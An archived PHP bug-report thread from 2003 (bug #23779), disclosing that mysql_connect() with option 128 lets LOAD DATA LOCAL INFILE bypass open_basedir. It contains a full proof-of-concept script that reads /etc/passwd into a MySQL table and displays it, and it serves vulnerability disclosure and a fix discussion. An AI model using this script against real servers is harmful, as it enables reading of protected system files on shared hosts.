#23779 [Bgs->Opn]: LOAD DATA LOCAL isn't respecting open_basedir

From: Date: Tue, 27 May 2003 07:53:26 +0000
Subject: #23779 [Bgs->Opn]: LOAD DATA LOCAL isn't respecting open_basedir
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-40481@lists.php.net to get a copy of this message
ID: 23779 User updated by: php at jkt dot wz dot cz Reported By: php at jkt dot wz dot cz -Status: Bogus +Status: Open Bug Type: MySQL related Operating System: any PHP Version: 4.3.1 New Comment: a) not security hole in mysql, it's problem of php b) you don't need file privileges for 'load data local infile' solution: add php.ini option mysql_local_infile; in mysql_connect() check for 128 and if not enabled, clear it (ie. option&0x7f) Previous Comments: ------------------------------------------------------------------------ [2003-05-24 01:34:19] georg@php.net It's not a security hole. This only works when the connected user has file privileges. ------------------------------------------------------------------------ [2003-05-23 19:10:18] sniper@php.net After a bit more thinking, this is not really PHP problem to solve, it's a security hole in Mysql.. ------------------------------------------------------------------------ [2003-05-23 19:02:30] sniper@php.net Only solution I can think of is to deny the use of MYSQL_OPT_LOCAL_INFILE either totally or just when safe-mode is enabled.. ------------------------------------------------------------------------ [2003-05-23 08:49:44] php at jkt dot wz dot cz i'm using php/4.3.0 (i haven't access to newer version), mysql/3.23.49 or 4.0.11-gamma; i haven't noticed any changes in cvs changelog [http://cvs.php.net/co.php/php4/ChangeLog?login=2&r=1.1323] if you made a connection with mysql_connect() and specify 128 as fifth parameter (options), you can perform sql LOAD DATA LOCAL INFILE statements. the file accesses are made by mysql client library, so you can access any file which webserver process can access to, IGNORING open_basedir option! (and perhaps also safe-mode uid/gid checks, i don't know...) test script: $user='**'; $pass='**'; $host='**'; $db='**'; $table='files'; $filename='/etc/passwd'; $line_term='-----------[line_terminator]------------'; $m=mysql_connect($host, $user, $pass, false, 128); // connect with MYSQL_OPT_LOCAL_INFILE (in php manual undocumented) option mysql_select_db($db, $m); mysql_query("create table if not exists $table (str text not null)", $m); // create our table mysql_query('load data local infile "'.mysql_escape_string($filename).'" into table '.$table.' lines terminated by "'.mysql_escape_string($line_term).'"'); // upload file echo "ok, upload success ;-)\n"; $res=mysql_query("select * from $table", $m); // verify & display echo '<pre>'; while($line=mysql_fetch_assoc($res)) { echo htmlspecialchars($line['str']); } echo '</pre>'; mysql_query('truncate table '.$table, $m); echo 'have a nice day...'; ------------------------------------------------------------------------ -- Edit this bug report at http://bugs.php.net/?id=23779&edit=1

« previous php.bugs (#40481) next »